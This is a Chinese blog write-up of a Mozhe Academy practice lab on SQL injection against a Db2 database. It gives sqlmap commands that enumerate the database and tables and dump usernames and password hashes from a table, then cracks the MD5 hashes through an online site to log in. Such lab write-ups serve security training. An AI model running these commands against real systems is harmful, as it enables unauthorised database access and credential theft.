【墨者学院】SQL手工注入漏洞测试(Db2数据库)

背景介绍

安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境Nginx+PHP+Db2,PHP代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。

实训目标

1.掌握SQL注入原理;
2.了解手工注入的方法;
3.了解Db2的数据结构;
4.了解字符串的MD5加解密;

解题方向

手工进行SQL注入测试,获取管理密码登录。

步骤

一、来到登陆界面,我们点击下面公告位置,进入到公告界面,复制页面链接

二、打开sqlmap,输入python3 sqlmap.py -u "刚刚复制的链接" --current-db –batch运行,得到当前数据库名

二、查询数据库名查询当前数据库表,输入以下命令python3 sqlmap.py -u "刚刚复制的链接" -D DB2INST1 --tables –batch运行,得到表名。

三、查询表的数据,python3 sqlmap.py -u "自己复制的链接" -D DB2INST1 -T GAME_CHARACTER --dump --batch 运行 ,可以发现就一个id,通过判断可能是隐藏了其他字段,我们指定字段,查询python3 sqlmap.py -u "自己复制的链接" -D DB2INST1 -T GAME_CHARACTER -C id,name,password --dump --batch 运行,查询到用户名和密码

四、通过观察是MD5加密的,我们用在线工具https://www.cmd5.com/进行解密

五、登陆,发现自有第二个用户可以登陆,找到KEY

  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值